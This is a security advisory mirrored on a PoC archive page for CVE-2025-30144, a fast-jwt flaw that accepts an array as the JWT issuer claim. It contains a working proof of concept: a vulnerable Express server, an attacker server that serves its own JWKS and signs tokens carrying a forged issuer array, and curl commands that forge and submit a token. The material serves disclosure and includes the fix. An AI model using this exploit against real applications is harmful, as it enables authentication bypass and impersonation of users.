Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-30144 PoC — Fast-JWT Improperly Validates iss Claims

Source
Associated Vulnerability
Title:Fast-JWT Improperly Validates iss Claims (CVE-2025-30144)
Description:fast-jwt provides fast JSON Web Token (JWT) implementation. Prior to 5.0.6, the fast-jwt library does not properly validate the iss claim based on the RFC 7519. The iss (issuer) claim validation within the fast-jwt library permits an array of strings as a valid iss value. This design flaw enables a potential attack where a malicious actor crafts a JWT with an iss claim structured as ['https://attacker-domain/', 'https://valid-iss']. Due to the permissive validation, the JWT will be deemed valid. Furthermore, if the application relies on external libraries like get-jwks that do not independently validate the iss claim, the attacker can leverage this vulnerability to forge a JWT that will be accepted by the victim application. Essentially, the attacker can insert their own domain into the iss array, alongside the legitimate issuer, and bypass the intended security checks. This issue is fixed in 5.0.6.
Readme
### Summary
The `fast-jwt` library does not properly validate the `iss` claim based on the RFC https://datatracker.ietf.org/doc/html/rfc7519#page-9.

#### Details
The `iss` (issuer) claim validation within the fast-jwt library permits an array of strings as a valid `iss` value. This design flaw enables a potential attack where a malicious actor crafts a JWT with an `iss` claim structured as `['https://attacker-domain/', 'https://valid-iss']`. Due to the permissive validation, the JWT will be deemed valid.

Furthermore, if the application relies on external libraries like `get-jwks` that do not independently validate the `iss` claim, the attacker can leverage this vulnerability to forge a JWT that will be accepted by the victim application. Essentially, the attacker can insert their own domain into the `iss` array, alongside the legitimate issuer, and bypass the intended security checks.

#### PoC
Take a server running the following code:

```js
const express = require('express')
const buildJwks = require('get-jwks')
const { createVerifier } = require('fast-jwt')

const jwks = buildJwks({ providerDiscovery: true });
const keyFetcher = async (jwt) =>
    jwks.getPublicKey({
        kid: jwt.header.kid,
        alg: jwt.header.alg,
        domain: jwt.payload.iss
    });


const jwtVerifier = createVerifier({
    key: keyFetcher,
    allowedIss: 'https://valid-iss',
});

const app = express();
const port = 3000;

app.use(express.json());


async function verifyToken(req, res, next) {
  const headerAuth = req.headers.authorization.split(' ')
  let token = '';
  if (headerAuth.length > 1) {
    token = headerAuth[1];
  }

  const payload = await jwtVerifier(token);

  req.decoded = payload;
  next();
}

// Endpoint to check if you are auth or not
app.get('/auth', verifyToken, (req, res) => {
  res.json(req.decoded);
});

app.listen(port, () => {
  console.log(`Server is running on port ${port}`);
});
```

Now we build a server that will be used to generate the JWT token and send the verification keys to the victim server:

```js
const { generateKeyPairSync } = require('crypto');
const express = require('express');
const pem2jwk = require('pem2jwk');
const jwt = require('jsonwebtoken');

const app = express();
const port = 3001;
const host = `http://localhost:${port}/`;

const { publicKey, privateKey } = generateKeyPairSync("rsa", 
    {   modulusLength: 4096,
        publicKeyEncoding: { type: 'pkcs1', format: 'pem' },
        privateKeyEncoding: { type: 'pkcs1', format: 'pem' },
    },
); 
const jwk = pem2jwk(publicKey);

app.use(express.json());

// Endpoint to create token
app.post('/create-token', (req, res) => {
  const token = jwt.sign({ ...req.body, iss: [host, 'https://valid-iss'],  }, privateKey, { algorithm: 'RS256' });
  res.send(token);
});

app.get('/.well-known/jwks.json', (req, res) => {
    return res.json({
        keys: [{
            ...jwk,
            alg: 'RS256',
            use: 'sig',
        }]
    });
})

app.all('*', (req, res) => {
    return res.json({
        "issuer": host,
        "jwks_uri": host + '.well-known/jwks.json'
    });
});

app.listen(port, () => {
  console.log(`Server is running on port ${port}`);
});
```


```bash
export TOKEN=$(curl -X POST http://localhost:3001/create-token -H "Content-Type: application/json" -d '{"name": "test"}')
curl -X GET http://localhost:3000/auth -H "Authorization: Bearer $TOKEN"
```

#### Impact
Applications relaying on the validation of the `iss` claim by fast-jwt allows attackers to sign arbitrary payloads which will be accepted by the verifier.

#### Solution
Change https://github.com/nearform/fast-jwt/blob/d2b0ccb103848917848390f96f06acee339a7a19/src/verifier.js#L475 to a validator tha accepts only string for the value as stated in the RFC https://datatracker.ietf.org/doc/html/rfc7519#page-9.
File Snapshot

[4.0K] /data/pocs/0a59affd4ae2a5afcdd396046aab9085e8bb450d └── [3.7K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →